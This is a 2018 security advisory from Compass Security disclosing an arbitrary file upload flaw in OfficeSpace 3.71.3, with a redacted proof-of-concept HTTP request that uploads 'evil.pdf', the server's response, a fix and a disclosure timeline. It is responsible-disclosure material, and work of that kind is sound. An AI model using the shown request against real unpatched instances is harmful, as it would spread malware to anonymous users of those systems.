############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: OfficeSpace [1] # Vendor: OfficeSpace Software Inc. # CSNC ID: CSNC-2018-018 # Subject: Arbitrary File Upload # Risk: High # Effect: Remotely exploitable # Author: Stephan Sekula # Date: 18.04.2018 # ############################################################# Introduction: ------------- The smarter, easier way to manage your space. [1] Compass Security discovered a security flaw in OfficeSpace, which allows users to spread malware to anonymous users. Affected: --------- Vulnerable: * Version 3.71.3 Technical Description --------------------- Users are able to upload arbitrary files to the system. Uploaded files are neither checked for their file type nor for malware. Further, files can be accessed by anonymous users, which increases the risk of this vulnerability. Request (uploading a pdf containing malware): POST /request-manager/attachments HTTP/1.1 Host: [CUT] Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-Token: [CUT] X-Requested-With: XMLHttpRequest Content-Length: 46454 Content-Type: multipart/form-data; boundary=[CUT] Cookie: showBrowserWarning=true; _huddle_session=[CUT] Connection: close -----------------------------[CUT] Content-Disposition: form-data; name="request_attachment[attachment]"; filename="evil.pdf" Content-Type: application/pdf %PDF-1.0 [CUT] endstream endobj 9 0 obj <> endobj 10 0 obj [CUT] Response: HTTP/1.1 200 OK Date: Wed, 18 Apr 2018 05:36:47 GMT X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Type: application/json; charset=utf-8 Cache-Control: max-age=0, private, must-revalidate Strict-Transport-Security: max-age=15552000; includeSubDomains Set-Cookie: _huddle_session=[CUT]; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Length: 265 Connection: close {"id":15,"request_id":null,"attachment_file_name":"evil.pdf", "attachment_content_type":"application/pdf","attachment_file_size":46209, "attachment_updated_at":"[CUT]", "created_at":"[CUT]","updated_at":"[CUT]"} Workaround / Fix: ----------------- This issue can be fixed by properly checking uploaded files for their contents and for malware. Timeline: --------- 2018-07-31: Public disclosure date 2018-05-02: Initial vendor response 2018-04-23: Initial vendor notification 2018-04-18: Discovery by Stephan Sekula References: ----------- [1] https://www.officespacesoftware.com